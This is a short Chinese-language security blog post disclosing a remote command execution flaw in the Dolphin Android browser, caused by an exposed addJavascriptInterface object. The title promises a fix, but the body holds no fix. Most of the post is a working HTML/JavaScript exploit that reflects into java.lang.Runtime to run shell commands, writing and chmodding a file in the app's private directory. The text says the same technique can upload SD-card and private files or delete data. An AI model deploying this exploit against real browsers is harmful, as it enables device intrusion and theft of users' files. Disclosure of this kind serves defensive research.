海豚手机浏览器存在远程命令执行及修复

浏览： ℃

字体：大中小

发布时间：2013-12-09 23:23:32

来源：

海豚手机浏览器存在远程命令执行漏洞(js代码执行系统命令)

漏洞存在于海豚浏览器中，不需要root即可，addJavascriptInterface导出多处。

addJavascriptInterface导出到js中使用java类，可以反射导致命令执行等等利用

海豚浏览器，反编译后com/dolphin/browser/extension/RSSChecker.smali中，存在

const-string/jumbo v1, "dolphinRSSChecker"

invoke-interface {p1, v0, v1}, Lcom/dolphin/browser/core/IWebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

这里使用导出的dolphinRSSChecker，还有其他导出到js的java类也可以使用，海豚浏览器导出了多处，都注意下吧。

构造exploit部分内容如下:(html文件)

<script>function execute(cmdArgs){        alert(typeof(dolphinRSSChecker));        return dolphinRSSChecker.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}              var content = "//xff//xff";var pathcontent = "/data/data/com.dolphin.browser.xf/files/neirong"; execute(["/system/bin/sh","-c","echo '"+content+"' > " + pathcontent]);execute(["chmod","755",pathcontent]);//execute([patharm,"f",upload]);</script>

构造上述内容调用后可以执行命令，可以做很多事情，例如上传sd卡文件，上传私有目录下的可读文件、删除文件等等。

访问带有测试js代码的网站